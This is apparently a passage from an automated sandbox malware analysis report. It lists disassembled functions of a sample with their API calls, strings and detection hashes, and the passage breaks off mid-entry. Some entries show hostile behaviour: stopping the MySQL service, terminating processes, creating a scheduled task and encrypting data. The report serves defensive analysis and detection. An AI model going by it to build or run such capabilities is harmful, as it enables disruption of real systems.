                                                                                                                                                    • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                                                                    • Opcode ID: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                                                                                                                                                    • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                                                                    • Opcode Fuzzy Hash: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                                                                                                                                                    • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                                                                    • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                                                                    • _memset.LIBCMT ref: 0040DC38
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                    • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                    • API String ID: 330603062-1376107329
                                                                                                                                                    • Opcode ID: 2e74f348d978aa6d86d7a4bcf4ad75af8e5eec8b3156eaf57847e3efada330f4
                                                                                                                                                    • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                                                                    • Opcode Fuzzy Hash: 2e74f348d978aa6d86d7a4bcf4ad75af8e5eec8b3156eaf57847e3efada330f4
                                                                                                                                                    • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                                                                    • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                    • String ID: MYSQL
                                                                                                                                                    • API String ID: 2359367111-1651825290
                                                                                                                                                    • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                    • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                                                                    • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                                    • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                                                                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                                                                    • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                                                                      • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                    • String ID: bad function call
                                                                                                                                                    • API String ID: 2464034642-3612616537
                                                                                                                                                    • Opcode ID: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                                                                                                                                                    • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                                                                    • Opcode Fuzzy Hash: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                                                                                                                                                    • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                                                                    • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                    • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                    • API String ID: 1717984340-2085858615
                                                                                                                                                    • Opcode ID: be616ba235d46952bd7123a3b39f434c181f785b134dc0b79af551b0b3c55c5d
                                                                                                                                                    • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                                                                    • Opcode Fuzzy Hash: be616ba235d46952bd7123a3b39f434c181f785b134dc0b79af551b0b3c55c5d
                                                                                                                                                    • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                    • String ID: cmd.exe
                                                                                                                                                    • API String ID: 2696918072-723907552
                                                                                                                                                    • Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                                                                    • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                                                                    • Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                                                                    • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                    • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                    • API String ID: 1783060780-3771355929
                                                                                                                                                    • Opcode ID: 8cedc797476402b5fb366602ae38366f425c4ee5d90d53b93b2969e3f3d1c6b7
                                                                                                                                                    • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                                                                    • Opcode Fuzzy Hash: 8cedc797476402b5fb366602ae38366f425c4ee5d90d53b93b2969e3f3d1c6b7
                                                                                                                                                    • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                    • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                    • API String ID: 909875538-2908105608
                                                                                                                                                    • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                    • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                                                                    • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                    • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                    • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                                                                    • API String ID: 1302938615-3129329331
                                                                                                                                                    • Opcode ID: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                                                                                                                                                    • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                                                                    • Opcode Fuzzy Hash: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                                                                                                                                                    • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __init_pointers.LIBCMT ref: 00425141
                                                                                                                                                      • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                                                                      • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                                                                      • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                                                                      • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                                                                    • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                                                                    • __mtterm.LIBCMT ref: 0042514F
                                                                                                                                                      • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                                                                      • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                                                                      • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00425174
                                                                                                                                                    • __initptd.LIBCMT ref: 00425196
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3567560977-0
                                                                                                                                                    • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                                                                    • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                                                                    • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                                                                    • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0042594A
                                                                                                                                                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                      • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                    • _free.LIBCMT ref: 00425970
                                                                                                                                                      • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
                                                                                                                                                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13
                                                                                                                                                    • __lock.LIBCMT ref: 00425989
                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                                                                    • _free.LIBCMT ref: 004259C4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 626533743-0
                                                                                                                                                    • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                    • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                                                                    • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                    • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___from_strstr_to_strchr
                                                                                                                                                    • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                    • API String ID: 601868998-2416195885
                                                                                                                                                    • Opcode ID: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                                                                                                                                                    • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                                                                    • Opcode Fuzzy Hash: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                                                                                                                                                    • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
